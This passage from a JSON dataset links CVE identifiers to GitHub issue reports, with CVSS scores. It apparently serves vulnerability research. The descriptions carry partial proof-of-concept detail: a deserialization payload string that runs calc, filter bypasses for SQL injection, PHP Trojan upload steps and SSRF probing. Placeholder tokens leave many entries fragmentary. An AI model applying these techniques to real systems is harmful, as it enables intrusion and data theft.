  52025. "impactScore": 3.6,
  52026. "exploitabilityScore": 2.8
  52027. },
  52028. {
  52029. "CVE_ID": "CVE-2020-19861",
  52030. "Issue_Url_old": "https://github.com/NLnetLabs/ldns/issues/51",
  52031. "Issue_Url_new": "https://github.com/nlnetlabs/ldns/issues/51",
  52032. "Repo_new": "nlnetlabs/ldns",
  52033. "Issue_Created_At": "2019-09-26T03:30:58Z",
  52034. "description": "Heap Out of bound Read vulnerability. Description\uff1a When the zone file is parsed, the function ldns_nsec3_salt_data is too trusted for the length value obtained from the zone file. When the memcpy is copied, the NUMBERTAG fe ldns_rdf_size(salt_rdf) byte data can be copied, causing heap information leakage. Vulnerability location\uff1a FILETAG fuzz log\uff1a FILETAG Repaire Suggestion\uff1a FILETAG",
  52035. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52036. "severity": "HIGH",
  52037. "baseScore": 7.5,
  52038. "impactScore": 3.6,
  52039. "exploitabilityScore": 3.9
  52040. },
  52041. {
  52042. "CVE_ID": "CVE-2020-19896",
  52043. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/36",
  52044. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/36",
  52045. "Repo_new": "bg5sbk/minicms",
  52046. "Issue_Created_At": "2019-08-23T07:27:06Z",
  52047. "description": "file inclusion vulnerability. Require: PHP Version NUMBERTAG magic_quotes_gpc=off NUMBERTAG require $index_file $index_file = PATHTAG $post_old_state = $data FILETAG NUMBERTAG write a page or article with content FILETAG NUMBERTAG can see url is FILETAG so filename is NUMBERTAG kbz NUMBERTAG bat NUMBERTAG use burppsuite,we can find phpinfo in response FILETAG",
  52048. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52049. "severity": "CRITICAL",
  52050. "baseScore": 9.8,
  52051. "impactScore": 5.9,
  52052. "exploitabilityScore": 3.9
  52053. },
  52054. {
  52055. "CVE_ID": "CVE-2020-19897",
  52056. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/183",
  52057. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/183",
  52058. "Repo_new": "wuzhicms/wuzhicms",
  52059. "Issue_Created_At": "2019-08-01T08:29:05Z",
  52060. "description": "wuzhicms NUMBERTAG statcode reflected xss vulnerability . A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of APITAG POC ji APITAG APITAG Vulnerability trigger point URLTAG When attacker access system settings basic settings, Write poc in the statcode form , then XSS vulnerability is triggered successfully NUMBERTAG choose this part and write poc to FILETAG NUMBERTAG submit and view webpage FILETAG",
  52061. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52062. "severity": "MEDIUM",
  52063. "baseScore": 6.1,
  52064. "impactScore": 2.7,
  52065. "exploitabilityScore": 2.8
  52066. },
  52067. {
  52068. "CVE_ID": "CVE-2020-19907",
  52069. "Issue_Url_old": "https://github.com/mitre/caldera/issues/462",
  52070. "Issue_Url_new": "https://github.com/mitre/caldera/issues/462",
  52071. "Repo_new": "mitre/caldera",
  52072. "Issue_Created_At": "2019-09-02T10:03:53Z",
  52073. "description": "OS Command Injection in sandcat plugin. login the caldera open the url URLTAG Enter a url, click clone button APITAG FILETAG FILETAG",
  52074. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  52075. "severity": "HIGH",
  52076. "baseScore": 8.8,
  52077. "impactScore": 5.9,
  52078. "exploitabilityScore": 2.8
  52079. },
  52080. {
  52081. "CVE_ID": "CVE-2020-19915",
  52082. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/173",
  52083. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/173",
  52084. "Repo_new": "wuzhicms/wuzhicms",
  52085. "Issue_Created_At": "2019-03-05T10:36:17Z",
  52086. "description": "There is a XSS vulnerability . A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form[smtp_user] parameter post to the PATHTAG When administrator access system settings mail server .then XSS vulnerability is triggered successfully POC xss payload: \"> APITAG Vulnerability trigger point POST PATHTAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Content Type: application/x www form urlencoded Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh; APITAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Connection: close APITAG APITAG when administrator access system settings mail server .then XSS vulnerability is triggered",
  52087. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52088. "severity": "MEDIUM",
  52089. "baseScore": 6.1,
  52090. "impactScore": 2.7,
  52091. "exploitabilityScore": 2.8
  52092. },
  52093. {
  52094. "CVE_ID": "CVE-2020-19924",
  52095. "Issue_Url_old": "https://github.com/BoostIO/Boostnote/issues/3178",
  52096. "Issue_Url_new": "https://github.com/boostio/boostnote-legacy/issues/3178",
  52097. "Repo_new": "boostio/boostnote-legacy",
  52098. "Issue_Created_At": "2019-07-28T14:16:18Z",
  52099. "description": "Notes Exported to PDF Format Is Existing XSS Attacks. Current behavior Notes Exported to PDF Format Is Existing XSS Attacks. Expected behavior Notes Exported to PDF Format Is Existing XSS Attacks. When there is a code in the note: \\ APITAG XSS attacks are triggered when the export PDF function is reused. FILETAG Steps to reproduce NUMBERTAG Put the payload below into your notes. Payload: \\ APITAG I cut a picture: FILETAG NUMBERTAG Click on the APITAG button in the upper right corner of the note to export the file in PDF format. This will trigger payload to generate a bullet window, that is, there is an XSS attack NUMBERTAG Here is a demo video: FILETAG Environment Version NUMBERTAG OS Version and name : Microsoft Windows NUMBERTAG Home Chinese Version",
  52100. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52101. "severity": "MEDIUM",
  52102. "baseScore": 5.4,
  52103. "impactScore": 2.7,
  52104. "exploitabilityScore": 2.3
  52105. },
  52106. {
  52107. "CVE_ID": "CVE-2020-19949",
  52108. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/21",
  52109. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/21",
  52110. "Repo_new": "yzmcms/yzmcms",
  52111. "Issue_Created_At": "2019-08-05T11:27:25Z",
  52112. "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in FILETAG Steps To Reproduce: APITAG Admin System NUMBERTAG create new page url: FILETAG CODETAG FILETAG APITAG link FILETAG Release Info NUMBERTAG author by barret. EMAILTAG .cn",
  52113. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  52114. "severity": "MEDIUM",
  52115. "baseScore": 4.8,
  52116. "impactScore": 2.7,
  52117. "exploitabilityScore": 1.7
  52118. },
  52119. {
  52120. "CVE_ID": "CVE-2020-19950",
  52121. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/22",
  52122. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/22",
  52123. "Repo_new": "yzmcms/yzmcms",
  52124. "Issue_Created_At": "2019-08-05T11:58:43Z",
  52125. "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in FILETAG Steps To Reproduce: APITAG Admin System NUMBERTAG create new page url: FILETAG CODETAG FILETAG APITAG links FILETAG Release Info NUMBERTAG author by barret. EMAILTAG .cn",
  52126. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  52127. "severity": "MEDIUM",
  52128. "baseScore": 4.8,
  52129. "impactScore": 2.7,
  52130. "exploitabilityScore": 1.7
  52131. },
  52132. {
  52133. "CVE_ID": "CVE-2020-19951",
  52134. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/43",
  52135. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/43",
  52136. "Repo_new": "yzmcms/yzmcms",
  52137. "Issue_Created_At": "2020-03-09T13:40:14Z",
  52138. "description": "A CSRF vulnerability exists in APITAG NUMBERTAG Introduction When the Administrator login APITAG can construct malicious POCS to fool administrator into accessing it then the APPID of Alipay, the private key of the merchant application, and the public key of Alipay can be change APITAG a attack can be get the profit of this website! Vulnerable code ERRORTAG CSRF APITAG CODETAG Proof FILETAG Suggestion Use the APITAG to protect it!",
  52139. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  52140. "severity": "HIGH",
  52141. "baseScore": 8.8,
  52142. "impactScore": 5.9,
  52143. "exploitabilityScore": 2.8
  52144. },
  52145. {
  52146. "CVE_ID": "CVE-2020-19964",
  52147. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/9",
  52148. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/9",
  52149. "Repo_new": "gaozhifeng/phpmywind",
  52150. "Issue_Created_At": "2019-10-28T06:19:09Z",
  52151. "description": "CSRF vulnerability exists in APITAG NUMBERTAG Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG The backend code writes the new user data to the database without authentication such as token CODETAG When the background administrator clicks the malicious link, the background will add an administrator user APITAG CODETAG APITAG FILETAG",
  52152. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  52153. "severity": "MEDIUM",
  52154. "baseScore": 6.5,
  52155. "impactScore": 3.6,
  52156. "exploitabilityScore": 2.8
  52157. },
  52158. {
  52159. "CVE_ID": "CVE-2020-20092",
  52160. "Issue_Url_old": "https://github.com/woider/ArticleCMS/issues/8",
  52161. "Issue_Url_new": "https://github.com/woider/articlecms/issues/8",
  52162. "Repo_new": "woider/articlecms",
  52163. "Issue_Created_At": "2019-08-15T12:40:09Z",
  52164. "description": "there is a File upload attack vulnerability. there is a File upload attack vulnerability,It can lead to arbitrary uploading of PHP script files. The location of the vulnerability is in URLTAG the content editing function is. FILETAG Let's see the code: FILETAG There are two problems NUMBERTAG The uploaded file detection is not strict, only the content type is detected, and even the file suffix is not detected, which causes us to modify the content type when uploading to bypass the upload php file NUMBERTAG File processing logic vulnerabilities, although there is a file abbreviated processing, but when uploading a sentence Trojan with a jpg file header, the server will not return the address, but the file is already stored on the server, so the file upload can be achieved. In addition, although the CMS detects and filters uploaded files, it will be automatically commented out if it matches APITAG APITAG to bypass My exploit is as follows: FILETAG Let's test it out. FILETAG as we can APITAG PHP Trojan has been successfully uploaded and validated.",
  52165. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52166. "severity": "CRITICAL",
  52167. "baseScore": 9.8,
  52168. "impactScore": 5.9,
  52169. "exploitabilityScore": 3.9
  52170. },
  52171. {
  52172. "CVE_ID": "CVE-2020-20120",
  52173. "Issue_Url_old": "https://github.com/top-think/thinkphp/issues/553",
  52174. "Issue_Url_new": "https://github.com/top-think/thinkphp/issues/553",
  52175. "Repo_new": "top-think/thinkphp",
  52176. "Issue_Created_At": "2019-08-23T09:39:22Z",
  52177. "description": "SQL injection problem exists for multiple functions below version NUMBERTAG I found a lot of such code in our extensive penetration test. APITAG Such code is not pre processed by sql during preprocessing. can be seen ERRORTAG or ERRORTAG And the official website also has a lot of such writings. FILETAG Are all wrong demonstrations that will cause more SQL injection Sql injection can also be performed in the FILETAG limit function and the order function. ERRORTAG",
  52178. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52179. "severity": "CRITICAL",
  52180. "baseScore": 9.8,
  52181. "impactScore": 5.9,
  52182. "exploitabilityScore": 3.9
  52183. },
  52184. {
  52185. "CVE_ID": "CVE-2020-20124",
  52186. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/188",
  52187. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/188",
  52188. "Repo_new": "wuzhicms/wuzhicms",
  52189. "Issue_Created_At": "2019-11-18T08:42:58Z",
  52190. "description": "Remote Code Execution Vulnerability In WUZHI CMS NUMBERTAG In the set_cache method of the PATHTAG file, when $data is not of the array type, $data will be written directly to the php file. ERRORTAG NUMBERTAG The set_cache method is called in the set method of the PATHTAG file, and $GLOBALS FILETAG",
  52191. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  52192. "severity": "HIGH",
  52193. "baseScore": 8.8,
  52194. "impactScore": 5.9,
  52195. "exploitabilityScore": 2.8
  52196. },
  52197. {
  52198. "CVE_ID": "CVE-2020-20128",
  52199. "Issue_Url_old": "https://github.com/wanglelecc/laracms/issues/33",
  52200. "Issue_Url_new": "https://github.com/wanglelecc/laracms/issues/33",
  52201. "Repo_new": "wanglelecc/laracms",
  52202. "Issue_Created_At": "2019-08-24T07:18:23Z",
  52203. "description": "Security Cleartext Transmission of Sensitive Information. FILETAG FILETAG FILETAG FILETAG The software transmits sensitive or security critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. So please encrypt the data with a reliable encryption scheme before transmitting.",
  52204. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52205. "severity": "HIGH",
  52206. "baseScore": 7.5,
  52207. "impactScore": 3.6,
  52208. "exploitabilityScore": 3.9
  52209. },
  52210. {
  52211. "CVE_ID": "CVE-2020-20129",
  52212. "Issue_Url_old": "https://github.com/wanglelecc/laracms/issues/34",
  52213. "Issue_Url_new": "https://github.com/wanglelecc/laracms/issues/34",
  52214. "Repo_new": "wanglelecc/laracms",
  52215. "Issue_Created_At": "2019-08-25T10:08:54Z",
  52216. "description": "\u5b58\u50a8\u578bXSS NUMBERTAG FILETAG APITAG APITAG FILETAG \u7136\u540e\u5b8c\u6210\u7f16\u8f91\uff0c\u70b9\u51fb\u63d0\u4ea4\u6309\u94ae FILETAG FILETAG \u4f7f\u7528\u76f8\u5173\u5de5\u5177\uff0c\u62e6\u622a\u63d0\u4ea4\u7684\u8bf7\u6c42\uff0c\u5e76\u5c06\u63d0\u4ea4\u7684 APITAG alert(\"test\") APITAG APITAG APITAG \u7684URL\u7f16\u7801 FILETAG FILETAG \u63d0\u4ea4\u8bf7\u6c42\u5230\u670d\u52a1\u5668\uff0c\u6b64\u65f6\u5bf9\u5e94\u811a\u672c\u5df2\u5199\u5165\u6570\u636e\u5e93\u4e2d\u3002 FILETAG FILETAG APITAG \u4fee\u590d\u5efa\u8bae\uff1a\u5bf9\u63d2\u5165\u7684\u8d85\u94fe\u63a5\u8bf7\u6c42\u5728\u670d\u52a1\u5668\u7aef\u4e5f\u505a\u7f16\u7801\u548c\u8fc7\u6ee4\u3002",
  52217. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52218. "severity": "MEDIUM",
  52219. "baseScore": 5.4,
  52220. "impactScore": 2.7,
  52221. "exploitabilityScore": 2.3
  52222. },
  52223. {
  52224. "CVE_ID": "CVE-2020-20131",
  52225. "Issue_Url_old": "https://github.com/wanglelecc/laracms/issues/36",
  52226. "Issue_Url_new": "https://github.com/wanglelecc/laracms/issues/36",
  52227. "Repo_new": "wanglelecc/laracms",
  52228. "Issue_Created_At": "2019-08-27T18:37:59Z",
  52229. "description": "Stored XSS of PAGE control. FILETAG FILETAG FILETAG FILETAG FILETAG The vunerbility is founded in laracms NUMBERTAG Hackers can inject a script in the place where the page is managed. It's content accept all user input and store to the database. While other user accessing this website will excute the script. You should filter and escape the output which is picked up from database before show it to the users.",
  52230. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52231. "severity": "MEDIUM",
  52232. "baseScore": 5.4,
  52233. "impactScore": 2.7,
  52234. "exploitabilityScore": 2.3
  52235. },
  52236. {
  52237. "CVE_ID": "CVE-2020-20136",
  52238. "Issue_Url_old": "https://github.com/QuantConnect/Lean/issues/3537",
  52239. "Issue_Url_new": "https://github.com/quantconnect/lean/issues/3537",
  52240. "Repo_new": "quantconnect/lean",
  52241. "Issue_Created_At": "2019-08-25T09:35:19Z",
  52242. "description": "Insecure Deserialization due to insecure APITAG leads to Code Execution.. Expected Behavior The application should not deserialize untrusted data which is user controllable without proper checks and validation of incoming types. Actual Behavior While deserializing a string, the deserializer is able to invoke unsafe classes that can execute OS commands due to insecure configuration of APITAG property in APITAG , which is currently set to All from version NUMBERTAG to NUMBERTAG The vulnerable code is in PATHTAG line NUMBERTAG Potential Solution NUMBERTAG While deserializing untrusted data. DO NOT use any APITAG other than None. ( Highly Recommended NUMBERTAG If APITAG other than None is required, then use a APITAG to validate and whitelist the incoming types . Reproducing the Problem NUMBERTAG After opening the solution in visual studio, write the below lines of code in any class that inherits from APITAG class. I have written below code in APITAG // string containing exploit code. The string source can be data from remote data server or local file. string server_data = \"{ $type : APITAG , APITAG : Start , APITAG :{ $type : APITAG , $values : calc ]}, APITAG :{ $type : APITAG }}\"; // Call the APITAG method in APITAG by passing string, which will try to deserialize the string to an object. object obj = APITAG NUMBERTAG Rebuild and run the solution. The calculator program will pop up. I have a video POC. Please request in case required APITAG System Information Tested on Windows NUMBERTAG with Visual Studio NUMBERTAG Community Edition. Codebase version tested NUMBERTAG Checklist I have completely filled out this template I have confirmed that this issue exists on the current master branch I have confirmed that this is not a duplicate issue by searching [issues URLTAG I have provided detailed steps to reproduce the issue",
  52243. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52244. "severity": "CRITICAL",
  52245. "baseScore": 9.8,
  52246. "impactScore": 5.9,
  52247. "exploitabilityScore": 3.9
  52248. },
  52249. {
  52250. "CVE_ID": "CVE-2020-20184",
  52251. "Issue_Url_old": "https://github.com/liftoff/GateOne/issues/736",
  52252. "Issue_Url_new": "https://github.com/liftoff/gateone/issues/736",
  52253. "Repo_new": "liftoff/gateone",
  52254. "Issue_Created_At": "2019-08-28T00:36:09Z",
  52255. "description": "A RCE Security vulnerability. In this file URLTAG There is a command execution and the argument comes from user input. FILETAG Poc NUMBERTAG Deploy a APITAG instance. URLTAG FILETAG FILETAG NUMBERTAG Open the dev tool in your browser, open the APITAG page. FILETAG NUMBERTAG Try to create an ssh connection. And watch the APITAG traffic, wait for the APITAG command executes. FILETAG NUMBERTAG Now we can switch the dev tool to console, and input this APITAG script to let APITAG APITAG send Our evil command. We can see that we get the command execution result from the error message. APITAG FILETAG",
  52256. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52257. "severity": "CRITICAL",
  52258. "baseScore": 9.8,
  52259. "impactScore": 5.9,
  52260. "exploitabilityScore": 3.9
  52261. },
  52262. {
  52263. "CVE_ID": "CVE-2020-20189",
  52264. "Issue_Url_old": "https://github.com/ornose15/NewPK/issues/1",
  52265. "Issue_Url_new": "https://github.com/ornose15/newpk/issues/1",
  52266. "Repo_new": "ornose15/newpk",
  52267. "Issue_Created_At": "2019-08-29T16:13:49Z",
  52268. "description": "There are a SQL inject at FILETAG . SQL inject start at line NUMBERTAG APITAG filtered by modify function APITAG ,but the problem is : filter rules are too APITAG function at FILETAG line NUMBERTAG ERRORTAG you can see it's just replace space to ' ' ,it's simple to bypass this filter with change space to comment ============================ here is sql inject position code: APITAG safe title ERRORTAG ============================ fix advice: add more filter rules or use APITAG to protect your variable",
  52269. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52270. "severity": "CRITICAL",
  52271. "baseScore": 9.8,
  52272. "impactScore": 5.9,
  52273. "exploitabilityScore": 3.9
  52274. },
  52275. {
  52276. "CVE_ID": "CVE-2020-2023",
  52277. "Issue_Url_old": "https://github.com/kata-containers/runtime/issues/2488",
  52278. "Issue_Url_new": "https://github.com/kata-containers/runtime/issues/2488",
  52279. "Repo_new": "kata-containers/runtime",
  52280. "Issue_Created_At": "2020-02-20T16:13:48Z",
  52281. "description": "clh: update the . Which feature do you think can be improved? Specify the feature you think could be made better. How can it be improved? Describe how specifically you think it could be improved. Additional Information Anything else to add? Before raising this feature request Have you looked at the FILETAG ?",
  52282. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
  52283. "severity": "MEDIUM",
  52284. "baseScore": 6.3,
  52285. "impactScore": 3.7,
  52286. "exploitabilityScore": 2.0
  52287. },
  52288. {
  52289. "CVE_ID": "CVE-2020-2023",
  52290. "Issue_Url_old": "https://github.com/kata-containers/agent/issues/791",
  52291. "Issue_Url_new": "https://github.com/kata-containers/agent/issues/791",
  52292. "Repo_new": "kata-containers/agent",
  52293. "Issue_Created_At": "2020-06-03T15:33:02Z",
  52294. "description": "Explicitly deny any access to the nvdimm root partition. Explicitly deny any access to the nvdimm root partition by adding the nvdimm device to the device cgroup.",
  52295. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
  52296. "severity": "MEDIUM",
  52297. "baseScore": 6.3,
  52298. "impactScore": 3.7,
  52299. "exploitabilityScore": 2.0
  52300. },
  52301. {
  52302. "CVE_ID": "CVE-2020-2024",
  52303. "Issue_Url_old": "https://github.com/kata-containers/runtime/issues/2474",
  52304. "Issue_Url_new": "https://github.com/kata-containers/runtime/issues/2474",
  52305. "Repo_new": "kata-containers/runtime",
  52306. "Issue_Created_At": "2020-02-19T12:52:15Z",
  52307. "description": "harden container hostpath cleanup. Description of problem A container's host path might be changed by the guest to point to some other places by placing a symlink there. kata runtime should not follow link when unmounting them otherwise we might end up unmounting some other mountpoints unexpectedly.",
  52308. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
  52309. "severity": "MEDIUM",
  52310. "baseScore": 6.5,
  52311. "impactScore": 4.0,
  52312. "exploitabilityScore": 2.0
  52313. },
  52314. {
  52315. "CVE_ID": "CVE-2020-2026",
  52316. "Issue_Url_old": "https://github.com/kata-containers/runtime/issues/2712",
  52317. "Issue_Url_new": "https://github.com/kata-containers/runtime/issues/2712",
  52318. "Repo_new": "kata-containers/runtime",
  52319. "Issue_Created_At": "2020-05-29T15:40:02Z",
  52320. "description": "host shared directory should be readonly. We need to make sure containers cannot modify host path unless it is explicitly shared to it. Right now we expose an additional top level shared directory to the guest and allow it to be modified. This is less ideal and can be enhanced by following method NUMBERTAG create two directories for each sandbox: . PATHTAG a directory to hold all host/guest shared mounts . PATHTAG a host/guest shared directory NUMBERTAG pfs/virtiofs source dir NUMBERTAG PATHTAG is bind mounted readonly to PATHTAG so guest cannot modify it NUMBERTAG host guest shared files/directories are mounted one level under PATHTAG and thus present to guest at one level under PATHTAG",
  52321. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  52322. "severity": "HIGH",
  52323. "baseScore": 8.8,
  52324. "impactScore": 6.0,
  52325. "exploitabilityScore": 2.0
  52326. },
  52327. {
  52328. "CVE_ID": "CVE-2020-20269",
  52329. "Issue_Url_old": "https://github.com/careteditor/issues/issues/841",
  52330. "Issue_Url_new": "https://github.com/careteditor/issues/issues/841",
  52331. "Repo_new": "careteditor/issues",
  52332. "Issue_Created_At": "2018-11-12T18:00:27Z",
  52333. "description": "Critical security issue in NUMBERTAG rc NUMBERTAG Hi guys, i found a critical security issue in APITAG and i would like to reach out to you privately so that i can give you the details without disclosing them publicly yet. Is there an email address i can write to?",
  52334. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52335. "severity": "CRITICAL",
  52336. "baseScore": 9.8,
  52337. "impactScore": 5.9,
  52338. "exploitabilityScore": 3.9
  52339. },
  52340. {
  52341. "CVE_ID": "CVE-2020-20294",
  52342. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/49",
  52343. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/49",
  52344. "Repo_new": "arterli/cmswing",
  52345. "Issue_Created_At": "2019-10-10T03:26:21Z",
  52346. "description": "Vulnerability Report: cmswing NUMBERTAG code execution. Find a code execution vulnerability in cmswing project version APITAG PDF file for details FILETAG",
  52347. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52348. "severity": "CRITICAL",
  52349. "baseScore": 9.8,
  52350. "impactScore": 5.9,
  52351. "exploitabilityScore": 3.9
  52352. },
  52353. {
  52354. "CVE_ID": "CVE-2020-20295",
  52355. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/50",
  52356. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/50",
  52357. "Repo_new": "arterli/cmswing",
  52358. "Issue_Created_At": "2019-10-10T03:56:23Z",
  52359. "description": "Vulnerability Report: cmswing NUMBERTAG APITAG sql injection. Find a code execution vulnerability in cmswing project version APITAG can be found in the analysis below. Vulnerability Location The vulnerability lies in the APITAG function in the APITAG CODETAG The variable data is the user behavior data transmitted by the front end. The function APITAG updates the user behavior using data. Due to the lack of data checking, SQL injection exists. When the user triggers the corresponding behavior, for example, adding articles, SQL statement execution will be triggered. Local Test Enter the background of the system, select user behavior\uff0cadd our payload to the rules of conduct FILETAG Add an article to trigger the user behavior just now. The SQL statement is executed successfully and the response time exceeds NUMBERTAG seconds. FILETAG FILETAG Database Execution Log FILETAG",
  52360. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52361. "severity": "CRITICAL",
  52362. "baseScore": 9.8,
  52363. "impactScore": 5.9,
  52364. "exploitabilityScore": 3.9
  52365. },
  52366. {
  52367. "CVE_ID": "CVE-2020-20296",
  52368. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/51",
  52369. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/51",
  52370. "Repo_new": "arterli/cmswing",
  52371. "Issue_Created_At": "2019-10-10T04:00:45Z",
  52372. "description": "Vulnerability Report: cmswing NUMBERTAG user recharge sql injection. Find a code execution vulnerability in cmswing project version APITAG can be found in the analysis below. Vulnerability Location The vulnerability lies in the APITAG function in the APITAG CODETAG The variable APITAG represents the amount of recharge. The function APITAG increases the amount of money by the specified user, but lacks sufficient checks for APITAG , which results in SQL injection when database update operation is performed. Local Test Enter the background of the system, select user recharge FILETAG Modify the balance to APITAG . it was found that the replenishment was successful and the response time was extended by NUMBERTAG seconds, proving that our statement was successfully injected into the database for execution. FILETAG Database Execution Log FILETAG",
  52373. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52374. "severity": "CRITICAL",
  52375. "baseScore": 9.8,
  52376. "impactScore": 5.9,
  52377. "exploitabilityScore": 3.9
  52378. },
  52379. {
  52380. "CVE_ID": "CVE-2020-20341",
  52381. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/44",
  52382. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/44",
  52383. "Repo_new": "yzmcms/yzmcms",
  52384. "Issue_Created_At": "2020-03-27T07:58:13Z",
  52385. "description": "A SSRF in yzmcms NUMBERTAG management. \u540e\u53f0\u7f16\u8f91\u6587\u7ae0\u5904\uff0c\u6700\u4e0b\u65b9\u9009\u9879 APITAG PATHTAG APITAG FILETAG When modifying an article or adding an article, you chose to load a remote file locally,It will enter the APITAG , which matches the img tag in the article content, extracts the link and saves it in $ val = $ value, and then uses strpos to determine whether there is http in the link. If not, it returns directly (indicating that this is not an external network image link). Then read the first dot from right to left as the segmentation to get the suffix name, and then check the suffix on the white list. The suffix name here can be bypassed by APITAG . Then there are vulnerabilities APITAG readfile reads the file content and saves it to a jpg file. If readfile reads a file with warning or error, it will jump to the error handling function. payload\uff1a APITAG You can probe the intranet port and ip here. At the same time, here is also a file reading vulnerability, but reading php files may report an error. Try reading FILETAG because the YZMPHP_PATH variable is not declared and an error is reported.",
  52386. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52387. "severity": "HIGH",
  52388. "baseScore": 7.5,
  52389. "impactScore": 3.6,
  52390. "exploitabilityScore": 3.9
  52391. },
  52392. {
  52393. "CVE_ID": "CVE-2020-20343",
  52394. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/8",
  52395. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/8",
  52396. "Repo_new": "taosir/wtcms",
  52397. "Issue_Created_At": "2019-09-04T11:12:45Z",
  52398. "description": "There is one CSRF vulnerability that can add news. You can add articles in admin background, but there is a CSRF vulnerability. FILETAG FILETAG FILETAG FILETAG POC CODETAG",
  52399. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  52400. "severity": "MEDIUM",
  52401. "baseScore": 6.5,
  52402. "impactScore": 3.6,
  52403. "exploitabilityScore": 2.8
  52404. },
  52405. {
  52406. "CVE_ID": "CVE-2020-20344",
